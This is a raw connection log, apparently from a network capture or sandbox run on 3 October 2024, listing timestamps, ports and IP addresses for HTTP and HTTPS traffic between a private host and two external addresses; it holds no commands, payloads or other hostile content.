Oct 3, 2024 02:52:58.428653955 CEST	80	49766	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:58.428776979 CEST	49766	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:58.429655075 CEST	49766	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:58.434761047 CEST	80	49766	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:58.446970940 CEST	49767	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:58.452023029 CEST	80	49767	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:58.452168941 CEST	49767	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:58.452884912 CEST	49767	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:58.452886105 CEST	49767	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:58.458034039 CEST	80	49767	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:58.458054066 CEST	80	49767	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:59.537938118 CEST	80	49767	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:59.545586109 CEST	80	49767	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:59.545774937 CEST	49767	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:59.545775890 CEST	49767	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:59.551242113 CEST	80	49767	190.219.117.240	192.168.2.4
Oct 3, 2024 02:53:16.712973118 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:16.713098049 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:16.713263988 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:16.713435888 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:16.713449955 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.306534052 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.306761980 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.308051109 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.308065891 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.308351994 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.311070919 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.311105013 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.311115980 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.662647963 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.662669897 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.662744999 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.662806988 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.706120014 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.749157906 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.749170065 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.749237061 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.749249935 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.750175953 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.750231028 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.750238895 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.788017035 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.788116932 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.788167953 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.816322088 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.816329956 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.816387892 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.816399097 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.836148024 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.836153984 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.836195946 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.836205006 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.836253881 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.836282969 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.836282969 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.837004900 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.837011099 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.837054968 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.837064981 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.837084055 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.838481903 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.838531017 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.838535070 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.838587046 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.838608027 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.856060982 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.856129885 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.856137037 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.874919891 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.874982119 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.874989033 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.874994993 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.875034094 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.884152889 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.884160042 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.884234905 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.884239912 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.884278059 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.903582096 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.903589010 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.903685093 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.903692007 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.904637098 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.904706955 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.904711962 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.923356056 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.923459053 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.923485041 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.924273968 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.924280882 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.924345970 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.924356937 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.925057888 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.925121069 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.925128937 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.943324089 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.943449974 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.943460941 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.943538904 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.943591118 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.943603992 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.943612099 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.943643093 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.962537050 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.962680101 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.962696075 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.962938070 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.963006020 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.963016987 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.963051081 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.963143110 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.963551998 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.963558912 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.963619947 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.963625908 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.963707924 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.971539974 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.971625090 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.971633911 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.971699953 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.971765041 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.971772909 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.990397930 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.990545034 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.990561008 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.991056919 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:17.991125107 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:17.991132021 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.010566950 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.010674953 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.010684967 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:18.010721922 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.010756016 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:18.010778904 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.010831118 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:18.010838985 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.011506081 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.011559963 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:18.011565924 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.011579037 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.011640072 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:18.011648893 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.012346983 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.012397051 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:18.012403965 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.013072014 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.013140917 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:18.013147116 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.030343056 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.030417919 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.030544996 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:18.030544996 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:18.030585051 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.049276114 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.049402952 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.049452066 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:18.049452066 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:18.050108910 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:18.050159931 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.050192118 CEST	49768	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:18.050208092 CEST	443	49768	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.226814032 CEST	49769	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:18.226902962 CEST	443	49769	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.226990938 CEST	49769	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:18.227446079 CEST	49769	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:18.227528095 CEST	443	49769	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.820089102 CEST	443	49769	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.820271969 CEST	49769	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:18.821254969 CEST	49769	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:18.821307898 CEST	443	49769	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.821660995 CEST	443	49769	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:18.822349072 CEST	49769	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:18.822395086 CEST	49769	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:18.822407007 CEST	443	49769	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:19.181483984 CEST	443	49769	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:19.181546926 CEST	443	49769	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:19.181727886 CEST	49769	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:19.181727886 CEST	49769	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:19.181727886 CEST	49769	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:19.187783957 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:19.187870026 CEST	443	49770	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:19.187961102 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:19.188288927 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:19.188325882 CEST	443	49770	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:19.487448931 CEST	49769	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:19.487512112 CEST	443	49769	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:19.794351101 CEST	443	49770	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:19.794500113 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:19.795556068 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:19.795586109 CEST	443	49770	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:19.795944929 CEST	443	49770	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:19.796679020 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:19.796720982 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:19.796739101 CEST	443	49770	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:20.075606108 CEST	443	49770	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:20.075701952 CEST	443	49770	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:20.075810909 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:20.075812101 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:20.075812101 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:20.075917006 CEST	443	49770	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:20.078763962 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:20.078855991 CEST	443	49771	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:20.079408884 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:20.079721928 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:20.079772949 CEST	443	49771	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:20.284415007 CEST	49770	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:20.284477949 CEST	443	49770	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:20.699584961 CEST	443	49771	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:20.699662924 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:20.700887918 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:20.700908899 CEST	443	49771	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:20.701143026 CEST	443	49771	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:20.701827049 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:20.701901913 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:20.701911926 CEST	443	49771	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:20.989937067 CEST	443	49771	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:20.989990950 CEST	443	49771	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:20.990134001 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:20.990134001 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:20.990134954 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:20.990230083 CEST	443	49771	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:21.024375916 CEST	49772	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:21.024467945 CEST	443	49772	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:21.024580002 CEST	49772	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:21.024854898 CEST	49772	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:21.024893999 CEST	443	49772	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:21.211484909 CEST	49771	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:21.211558104 CEST	443	49771	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:21.622314930 CEST	443	49772	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:21.622517109 CEST	49772	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:21.623280048 CEST	49772	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:21.623296022 CEST	443	49772	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:21.623491049 CEST	443	49772	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:21.627170086 CEST	49772	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:21.627191067 CEST	49772	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:21.627199888 CEST	443	49772	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:21.908746958 CEST	443	49772	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:21.908804893 CEST	443	49772	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:21.908901930 CEST	49772	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:21.909010887 CEST	49772	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:21.909061909 CEST	443	49772	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:21.909092903 CEST	49772	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:21.909107924 CEST	443	49772	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:21.912496090 CEST	49773	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:21.912540913 CEST	443	49773	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:21.912755013 CEST	49773	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:21.912842035 CEST	49773	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:21.912854910 CEST	443	49773	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:22.501189947 CEST	443	49773	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:22.501385927 CEST	49773	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:22.502381086 CEST	49773	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:22.502389908 CEST	443	49773	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:22.502630949 CEST	443	49773	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:22.504420996 CEST	49773	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:22.504420996 CEST	49773	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:22.504493952 CEST	443	49773	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:22.783735991 CEST	443	49773	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:22.783824921 CEST	443	49773	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:22.783966064 CEST	49773	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:22.785123110 CEST	49773	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:22.785124063 CEST	49773	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:22.785156012 CEST	443	49773	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:22.785176992 CEST	443	49773	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:23.018471956 CEST	49774	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:23.018515110 CEST	443	49774	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:23.018596888 CEST	49774	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:23.022157907 CEST	49774	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:23.022200108 CEST	443	49774	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:23.618422985 CEST	443	49774	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:23.618640900 CEST	49774	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:23.620121956 CEST	49774	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:23.620155096 CEST	443	49774	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:23.620488882 CEST	443	49774	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:23.621083975 CEST	49774	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:23.621114969 CEST	49774	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:23.621124029 CEST	443	49774	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:23.899770021 CEST	443	49774	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:23.899854898 CEST	443	49774	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:23.900002003 CEST	49774	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:23.902714968 CEST	49774	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:23.902730942 CEST	443	49774	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:23.902764082 CEST	49774	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:23.902775049 CEST	443	49774	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:23.905616999 CEST	49775	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:23.905713081 CEST	443	49775	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:23.905811071 CEST	49775	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:23.906040907 CEST	49775	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:23.906075001 CEST	443	49775	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:24.502640963 CEST	443	49775	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:24.502857924 CEST	49775	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:24.504486084 CEST	49775	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:24.504501104 CEST	443	49775	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:24.504836082 CEST	443	49775	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:24.505718946 CEST	49775	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:24.505753040 CEST	49775	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:24.505800962 CEST	443	49775	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:24.779025078 CEST	443	49775	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:24.779191971 CEST	443	49775	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:24.779278994 CEST	49775	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:24.779278994 CEST	49775	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:24.779365063 CEST	443	49775	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:24.779452085 CEST	49775	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:24.779468060 CEST	443	49775	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:24.785521984 CEST	49776	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:24.785610914 CEST	443	49776	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:24.785742044 CEST	49776	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:24.799137115 CEST	49776	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:24.799171925 CEST	443	49776	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:25.390659094 CEST	443	49776	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:25.390799999 CEST	49776	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:25.424812078 CEST	49776	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:25.424856901 CEST	443	49776	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:25.425770044 CEST	443	49776	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:25.432118893 CEST	49776	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:25.432171106 CEST	49776	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:25.432188034 CEST	443	49776	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:25.666610956 CEST	443	49776	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:25.666795015 CEST	443	49776	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:25.666872978 CEST	49776	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:25.670201063 CEST	49776	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:25.670242071 CEST	443	49776	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:25.670268059 CEST	49776	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:25.670283079 CEST	443	49776	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:25.685482025 CEST	49777	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:25.685570002 CEST	443	49777	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:25.685657024 CEST	49777	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:25.686043978 CEST	49777	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:25.686079979 CEST	443	49777	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:26.271819115 CEST	443	49777	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:26.271986961 CEST	49777	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:26.277676105 CEST	49777	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:26.277730942 CEST	443	49777	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:26.278088093 CEST	443	49777	23.145.40.162	192.168.2.4
